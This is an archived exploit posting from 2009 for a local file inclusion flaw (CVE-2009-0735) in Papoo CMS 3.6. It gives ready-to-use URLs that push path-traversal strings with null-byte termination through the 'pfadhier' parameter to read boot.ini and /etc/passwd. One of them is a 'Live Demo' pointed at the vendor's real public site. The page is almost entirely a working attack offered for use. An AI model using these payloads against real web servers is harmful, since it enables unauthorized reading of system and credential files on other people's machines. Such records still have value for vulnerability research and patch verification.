Papoo CMS 3.x - 'pfadhier' Local File Inclusion



EKU-ID: 15863 CVE: OSVDB-51858;CVE-2009-0735 OSVDB-ID:
Author: SirGod Published: 2009-02-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################################################################
[+] Papoo CMS 3.6 Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
#########################################################################################################

[+] Script Homepage : http://www.papoo-cms.com/

[+] Local File Inclusion

- PoC :

    http://127.0.0.1/[path]/lib/classes/message_class.php?pfadhier=[Local
File]%00

- Example :

     http://127.0.0.1/path/lib/classes/message_class.php?pfadhier=../../../../../../boot.ini%00

- Live Demo

     http://www.papoo-cms.com/lib/classes/message_class.php?pfadhier=../../../../../../etc/passwd%00

#########################################################################################################

# milw0rm.com [2009-02-10]